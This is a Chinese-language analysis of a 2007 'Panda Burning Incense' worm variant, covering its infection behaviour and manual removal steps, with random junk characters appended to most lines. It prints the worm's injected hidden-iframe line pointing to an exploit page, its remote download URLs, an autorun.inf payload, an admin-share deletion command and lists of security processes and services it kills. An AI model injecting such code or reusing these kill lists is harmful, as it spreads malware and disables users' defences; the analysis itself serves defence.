熊猫烧香最新变种分析及查杀方法

文件名称：nvscv32.exe N*+WGsxl$z  
`dhBLAt  
病毒名称：目前各杀毒软件无法查杀（已经将病毒样本上报各杀毒厂商） _jH./ @G  
<o/lK\>  
中文名称：（尼姆亚，熊猫烧香） -/Zy{2 <u  
R ^ZOcONd-  
病毒大小：68,570 字节 Mkr &30il[  
g
_rk_4]  
编写语言：Borland Delphi 6.0 - 7.0 G8'  
/x<uv_"  
加壳方式：FSG 2.0 -> bart/xt 'uF-}_ |  
*S?'[PS]1  
发现时间：2007.1.16 \-sW>LIA  
yCuLo`  
危害等级：高 G cB<i  
DXQ]b)y+N  
一、病毒描述： y9k'jEZ"oh  
Wiw~oXo  
含有病毒体的文件被运行后，病毒将自身拷贝至系统目录，同时修改注册表将自身设置为开机启动项，并遍历各个驱动器，将自身写入磁盘根目录下，增加一个 Autorun.inf文件，使得用户打开该盘时激活病毒体。随后病毒体开一个线程进行本地文件感染，并对局域网其他电脑进行扫描，同时开另外一个线程连接某网站下载木马程序进行发动恶意攻击。 lMcO2006L  
<$ qT(3w<y  
二：中毒现象： Tp.:2[  
q=*bcDu  
1：在系统每个分区根目录下存在setup.exe和autorun.inf文件（A和B盘不感染）。 O8Z+g{  
(?ULp{VPFl  
2：无法手工修改“文件夹选项”将隐藏文件显示出来。 sp+'c;a  
,/kZt!  
3：在每个感染后的文件夹中可见Desktop_ini的隐藏文件，内容为感染日期 如：2007-1-16 ]wfY<Z  
85
$ WH  
4：电脑上的所有脚本文件中加入以下代码：<iframe src=http://www.krvkr.com/worm.htm width=”0” height=”0”></iframe> @
|s$:;(=  
8|Ob7+  
5:中毒后的机器上常见的反病毒软件及防火墙无法正常开启及运行。  S9^SW3  
YW
"uC\kg|  
6：不能正常使用任务管理器，SREng.exe等工具。 ?zfm"o  
<"}t\pT]  
7：无故的向外发包，连接局域网中其他机器。 ju
07gzz  
[WV&Y,E  
三：技术分析 I8c:U2D  
1K(mdL{m5  
1：病毒文件运行后,将自身复制到%SystemRoot%\system32\drivers\nvscv32.exe a8-V`  
F_I
!qcEQ  
建立注册表自启动项: R0mkEM  
7{7Y[F0  
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\] %dzO*/8cWo  
M8$eMS1  
nvscv32: "C:\WINDOWS\system32\drivers\nvscv32.exe" apt$e$g  
R_>.O?U4  
2：查找反病毒窗体病毒结束相关进程: 4S4gK   
r^H,H'BohJ  
天网防火墙 q8n@fi6  
bZ:xH48MY  
virusscan
1hSV/%v_  
TY5R=jh=  
symantec antivirus Z1:<i*6>D  
n-{d7haOa  
system safety monitor jatlv/,  
|MagK$o  
system repair engineer U$3DIJVI  
$M/1pZ  
wrapped gift killer +-9-%O.(;  
|=KzQY|u  
游戏木马检测大师 +@yU `  
=f [/Pv  
超级巡警
w%..*+P  
!
m%'aQHH(  
3：结束以下进程: [h !
i{QD  
!^s -~`'\~  
mcshield.exe +6$-"lf  
gs=ok8w  
vstskmgr.exe b)M-q{  

"6U@e0ht  
naprdmgr.exe <mj/P|P@  
cvE)  
updaterui.exe !3\$XK]5ZT  
[@JK|50|K  
tbmon.exe d{t@+}0.u  
{QaO\{J=  
scan32.exe nC!]@lA  
/GM!3%'=  
ravmond.exe _}ii1fLv  
m#i4_F=^b  
ccenter.exe !]Qk?T~9-  
VBS}2>p  
ravtask.exe 60cQ3.e  
Gqc6]{  
rav.exe "\T-r2  
=wW M\f`=  
ravmon.exe S'W,AkT  
^suQ7#g  
ravmond.exe =:zPT;K  
>HRNB&]LdP  
ravstub.exe "Da-e\yA  
mpCu,l+lo  
kvxp.kxp !8T04988j  
x}Lj|U$r<X  
kvmonxp.kxp BfCn
yL%  
:uB?h1|  
kvcenter.kxp 6R^32VeK($  
jDTG15_=  
kvsrvxp.exe IVZUB*wv)b  
%3"3V1  
kregex.exe r<Z.J/a  
j|`lOH8  
uihost.exe ^#mWV  
I)vR  
trojdie.kxp &0\:MJc  
qg1\ABH  
frogagent.exe %&VI-7+K
 
?e4H{Y/M  
kvxp.kxp 8~t8^eBg  
j~V$q/7S  
kvmonxp.kxp n7G`b'  
3c7i8b$  
kvcenter.kxp OcPgw/ I  
S)wP];]`K  
kvsrvxp.exe GnUD<P=I  
1aV32oK  
kregex.exe cYe2a"  
2Xk;]-T!  
uihost.exe ]!P8{xmb@  
&+A78I   
trojdie.kxp a#i|)[  
64mD%URT  
frogagent.exe 8>LDo"<  
~x/ka43  
logo1_.exe [7HBn  
F[%k;aJ  
logo_1.exe RSbq<f>BFo  
>B~? }@^Gk  
rundl132.exe 3.hFYA w  
)u28:+8  
taskmgr.exe lF.kAEC  
kZ)}tA7j  
msconfig.exe ?PTXgIC  

/SS~IhUX  
regedit.exe v<g~EjzCf  
4
e eh+T  
sreng.exe #_aq@)Fd  
4：禁用下列服务: SiaW; ks  
D}X6I#U'/  
schedule sR83e|4I  
yEbo`/ ]b  
sharedaccess 4%8den,|  
iymN|KdpaZ  
rsccenter Y/I)ECm  
u^|cG{i5"  
rsravmon 1L'Q;?&2H,  
%kop
's&?C  
rsccenter ABe25Sus  
kh=<M{-t  
kvwsc LL (TD&  
+[MHl  
kvsrvxp ]1>R8   
[ 't.x=  
kvwsc 1:^Xd~X  
#\}FQl6  
kvsrvxp 7=u Gf$/  
V>Z4gZp5sc  
kavsvc NyRa.hgZ;  
z#PaQ
p5F  
avp ,.V<
rDwN&  
#|(>UM
\  
avp |94o P>d  
+_pfBJ_$%  
kavsvc U?{oxy_[2  
;
zo|. YD  
mcafeeframework )D/,QWk  
un~`|  
mcshield Q8h0.(#-  
5VOw}{Pt  
mctaskmanager
Kx)PK  

l-v m`-_#  
mcafeeframework ||wi4TP  
Nj2l>[L;  
mcshield Z:
N;>.3i  
/J_],KdU  
mctaskmanager n~\; +U  
C"**>OGe  
navapsvc !DSm[Z1  
J
h&DL8`  
wscsvc c?_7e9}2  
f"j9C%'*  
kpfwsvc 0?/gEr  
^JMG'@x  
sndsrvc ]N'%l]_$  
~BuBma_  
ccproxy V~/-e- 9u  
OOXSJE1  
ccevtmgr Xy K,  
'V:MppQVZ.  
ccsetmgr >FOCdlJ#  
K`9~#Zx$  
spbbcsvc =gR/ t@Ld  
hR7uAk_?  
symantec core lc u1y>7,Z6W  
{'M/wT)FeC  
npfmntor #'>)?]tn  
c,;VnZ 9wC  
mskservice x X3I`  
DMch88W  
firesvc z{w %pUn}  
2[pOGc$  
5：删除下列注册表项: VPT?z  

.4"BN<9  
software\microsoft\windows\currentversion\run\ravtask IaSPwsvt'  
:fL7"\ pf~  
software\microsoft\windows\currentversion\run\kvmonxp \C>IVz<O  
~?aFc)  
software\microsoft\windows\currentversion\run\kav F5cNF5  
!<~.>5UQ  
software\microsoft\windows\currentversion\run\kavpersonal50 _wb]tE ~g  
XtZd% #2},  
software\microsoft\windows\currentversion\run\mcafeeupdaterui _p1!8*0]  
WUz69o be  
software\microsoft\windows\currentversion\run\network associates error reporting service B1~`*~@  
/LWk>[
Z;  
software\microsoft\windows\currentversion\run\shstatexe 3$YbEl@#  
sBI/`dGZV  
software\microsoft\windows\currentversion\run\ylive.exe \7qj hA@  
`!I/6d?A  
software\microsoft\windows\currentversion\run\yassistse dz/@]a  
EFVZAY"+!;  
6：感染所有可执行文件，并将图标改成（这次不是熊猫烧香那个图标了） VvP: }yJ  
J>T98y/))  
7：跳过下列目录: ub>:dNBN  
UTu~"uCR  
windows P
nE7}  
0F- +)S?M[  
winnt FT6CKsM"  
vO9=CCxvq  
systemvolumeinformation wt
9f2  
NV/paoyx:*  
recycled Pb T2- F_  
1U/9=b  
windowsnt :PN%'~}n  
s Y1@~v  
windowsupdate "y7\F9  
%2I>-0]B  
windowsmediaplayer %Ul,9qG+  
#=y)Wuo=  
outlookexpress nxuH22:  
.kuNn-$  
netmeeting 7@gH{p1  
mpk+]n@  
commonfiles N3#^Ifn[  
)mN/e+/Lu  
complusapplications aizws[C  
_>`9]6\&  
commonfiles Yh!k uS#<  
*^G,  
messenger X0j>g^b8  
\/ri|fm6l#  
installshieldinstallationinformation j]%XY+e  
]CcRI|g}  
msn @IbZci)1  
~QUNR?h  
microsoftfrontpage aLW3Ub{h  
f &NX
~(  
moviemaker  ^b5+A6?  
9wf"5c  
msngaminzone .UX4p =  
(m Yi  
8：删除*.gho备份文件. alzdYiGf  
7uw-1F5x7  
9：在所有驱动器根目录建立自身文件副本setup.exe,建立autorun.inf文件使病毒自动运行,设置文件属性为隐藏、只读、系统. fsEQ4xN'  
J{a9pr6  
autorun.inf内容： kFkI[WKyZ  
32aI0CT  
程序代码 l-c:'n  
eF7I5k4  
[AutoRun] d:A'|;']  
t~ I;IB  
OPEN=setup.exe ~$^>Vo  
?ZC!E0]  
shellexecute=setup.exe }JQy&V%  
vY.VFEP/  
shell\Auto\command=setup.exe e#}Fm;|d  
m0.g}N-w  
10：删除共享：cmd.exe /c net share admin$ /del /y eG2'W  
fXnewPr=#  
11：在机器上所有脚本文件中加入<iframe src=http://www.krvkr.com/worm.htm width=”0” height=”0”></iframe>，此代码地址是一个利用MS-06014漏洞攻击的网页木马，一旦用户浏览中此病毒的服务器上的网页，如果系统没有打补丁，就会下载执行此病毒。 WZ!zUUp}V  
hop| xtai;  
12：扫描局域网机器，一旦发现漏洞，就迅速传播。 4|cRYZj5  
13：在后台访问http://www.whboy.net/update/wormcn.txt，根据下载列表下载其他病毒。 jFKp~`/#  
7KUf,0D  
目前下载列表如下： TT3GGHR  
LTA0WgzR)  
http://www.krvkr.com/down/cq.exe g<^A(zM  
B9 ?58v&  
http://www.krvkr.com/down/mh.exe ^@=4HtA  
RiQg]3oY  
http://www.krvkr.com/down/my.exe nW\W<[O9  
GJS(  
http://www.krvkr.com/down/wl.exe 1Lje.%(E.  
}|8^+V&  
http://www.krvkr.com/down/rx.exe 'ks .TS&  
|XNw&X1VF  
http://www.krvkr.com/down/wow.exe )J+OyR=  
.X.6<@$  
http://www.krvkr.com/down/zt.exe }C["'tLX  
}z9v*C  
http://www.krvkr.com/down/wm.exe hRB
?NM  
O+<+yQl  
http://www.krvkr.com/down/dj.exe z"QtP[_m  
L|s\IM1g  
http://www.krvkr.com/cn/iechajian.exe Pq{p\Qkj  
vy={ziJ  
到此病毒行为分析完毕。 ]D,_<Kk  
KC:6^h'.  
四：Sec120.Com专家解决方案： ld|GY>rH  
xbcmvJrG  
1：关闭网络共享，断开网络。 aEa+?6;D  
726UO#*  
2：使用IceSword结束掉nvscv32.exe进程（速度要快，抢在病毒感染IceSword前） Q;q{1M>  
H!"TS-s`  
3:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL CheckedValue的数值改为1 Ie _{P&J  
k}
}'fA  
4：删除注册表启动项 Q*'OY~  
%8Y+Df;ax  
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\] >@?mP$;=  
G*%U0OTi  
nvscv32: "C:\WINDOWS\system32\drivers\nvscv32.exe" jxhZOLG  
HSU?4=Q  
5：删除C:\WINDOWS\system32\drivers\nvscv32.exe 0SIUp/.  
!.pcldx  
6：删除每个盘根目录下的autorun.inf文件和setup.exe文件，利用搜索功能，将Desktop_.ini全部删除。  H4YA  
v,~fG
>Y}  
7：如果电脑上有脚本文件，将病毒代码全部删除。
,(sE|B#s  
",Mrdxn7  
8：关闭系统的自动播放功能。 G^VOA4  
EX, {1^h  
这样就基本上将病毒清除了